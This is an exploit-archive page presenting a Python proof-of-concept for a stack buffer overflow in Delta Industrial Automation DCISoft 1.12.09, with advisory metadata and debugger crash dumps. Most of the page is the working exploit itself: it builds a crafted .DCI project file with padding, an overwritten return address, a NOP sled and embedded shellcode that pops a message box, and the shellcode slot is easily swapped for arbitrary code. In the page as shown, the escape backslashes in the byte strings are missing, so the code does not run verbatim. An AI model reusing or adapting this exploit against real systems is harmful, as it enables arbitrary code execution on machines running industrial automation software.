Home / exploitsPDF  

Delta Industrial Automation DCISoft 1.12.09 Stack Buffer Overflow

Posted on 14 February 2016

#!/usr/bin/env python # # # Delta Industrial Automation DCISoft 1.12.09 Stack Buffer Overflow Exploit # # # Vendor: Delta Electronics, Inc. # Product web page: http://www.delta.com.tw # Software link: http://www.delta.com.tw/product/em/download/download_main.asp?act=3&pid=3&cid=5&tpid=3 # Affected version: 1.12.09 (Build 12102014) # # Summary: DCISoft is a integrated configuration tool of Delta # network modules (DVPEN01-SL, RTU-EN01, IFD9506, IFD9507, DVPSCM12-SL, # DVPSCM52-SL) for WINDOWS operation system. # # Desc: The vulnerability is caused due to a boundary error in # the processing of a project file, which can be exploited to # cause a stack based buffer overflow when a user opens e.g. a # specially crafted .DCI file. Successful exploitation allows # execution of arbitrary code on the affected machine. # # ---------------------------------------------------------------------------- # (1554.1830): Access violation - code c0000005 (!!! second chance !!!) # eax=00000001 ebx=0018f684 ecx=44444444 edx=777a4a20 esi=0018f65c edi=777a4a20 # eip=73d34b64 esp=0018cdd8 ebp=0018cdec iopl=0 nv up ei pl nz na po nc # cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 # MFC42!Ordinal2740+0x88: # 73d34b64 8b01 mov eax,dword ptr [ecx] ds:002b:44444444=???????? # 0:000> d esp # 0018cdd8 1c f6 18 00 a8 a5 47 00-01 00 00 00 01 00 00 00 ......G......... # 0018cde8 5c f6 18 00 fc cd 18 00-a4 59 41 00 e1 b5 85 88 ........YA..... # 0018cdf8 5c f6 18 00 d8 f8 18 00-fa 38 41 00 84 f6 18 00 ........8A..... # 0018ce08 c8 8f 74 02 e8 1f 7c 02-04 ce 18 00 c8 8f 74 02 ..t...|.......t. # 0018ce18 04 ce 18 00 44 44 44 44-44 44 44 44 44 44 44 44 ....DDDDDDDDDDDD # 0018ce28 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD # 0018ce38 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD # 0018ce48 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD # -- # (11bc.1394): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # Defaulted to export symbols for C:Program Files (x86)Delta Industrial AutomationCommunicationDCISoft 1.12MFC42.DLL - # eax=0018cdfc ebx=0018f684 ecx=0018cdec edx=ce085164 esi=0018f65c edi=31f7ae9c # eip=43434343 esp=0018cdcc ebp=0018cdec iopl=0 nv up ei pl nz ac pe cy # cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210217 # 43434343 ?? ??? # ---------------------------------------------------------------------------- # # Tested on: Microsoft Windows 7 Professional SP1 (EN) # Microsoft Windows 7 Ultimate SP1 (EN) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2016-5305 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5305.php # # # 13.11.2015 # sc = ("x31xd2xb2x30x64x8bx12x8bx52x0cx8bx52x1cx8bx42" "x08x8bx72x20x8bx12x80x7ex0cx33x75xf2x89xc7x03" "x78x3cx8bx57x78x01xc2x8bx7ax20x01xc7x31xedx8b" "x34xafx01xc6x45x81x3ex46x61x74x61x75xf2x81x7e" "x08x45x78x69x74x75xe9x8bx7ax24x01xc7x66x8bx2c" "x6fx8bx7ax1cx01xc7x8bx7cxafxfcx01xc7x68x65x64" "x21x01x68x20x50x77x6ex68x20x5ax53x4cx89xe1xfe" "x49x0bx31xc0x51x50xffxd7") buffer = "x41" * 156 # align buffer += "x3cxcex18x00" # eip - jmp esp+49h buffer += "x90" * 15 # nopsled buffer += sc # 113 bytes messagebox shellcode buffer += "x44" * 7926 # extra shellcode space buffer += "xecxcdx18x00" # overwrite data segment to control eip - mov eax,dword ptr [ecx] buffer += "x45" * 2203 # padding to fix 10421 bytes f = open ("Detachment.dci", "w") f.write(buffer) f.close() print "File Detachment.dci successfully created! "

 

TOP